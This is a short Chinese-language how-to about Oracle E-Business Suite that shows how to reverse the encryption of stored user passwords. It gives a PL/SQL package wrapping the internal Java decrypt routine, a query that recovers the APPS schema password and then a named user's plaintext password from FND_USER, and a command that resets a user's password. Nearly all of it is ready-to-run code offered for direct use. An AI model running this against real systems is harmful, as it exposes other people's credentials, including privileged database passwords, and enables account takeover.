我们知道,用户名密码在后台是经过编译之后的,我们不能看到用户名的密码,但是我们可以反编译
1、新建一个包
CREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USER AS
FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
RETURN VARCHAR2;
END CrackPwd;
/
CREATE OR REPLACE PACKAGE BODY CrackPwd AS
FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2)
RETURN VARCHAR2 AS
LANGUAGE JAVA
NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END CrackPwd;
/
2、使用sql查看用户名密码
SELECT USR.USER_NAME,
CRACKPWD.GETPWD ((SELECT (SELECT CRACKPWD.GETPWD (FND_WEB_SEC.GET_GUEST_USERNAME_PWD,
ENCRYPTED_FOUNDATION_PASSWORD)
FROM DUAL) AS APPS_PASSWORD
FROM FND_USER
WHERE USER_NAME =
(SELECT SUBSTR (FND_WEB_SEC.GET_GUEST_USERNAME_PWD,
1,
INSTR (FND_WEB_SEC.GET_GUEST_USERNAME_PWD, '/') - 1
)
FROM DUAL)),
USR.ENCRYPTED_USER_PASSWORD) PASSWORD
FROM FND_USER USR
WHERE USR.USER_NAME = 'S5M6238';
3、后台修改用户名密码
select fnd_web_sec.change_password('DA', '111111')
from fnd_user
where user_name = 'DA'
return 'Y'表示成功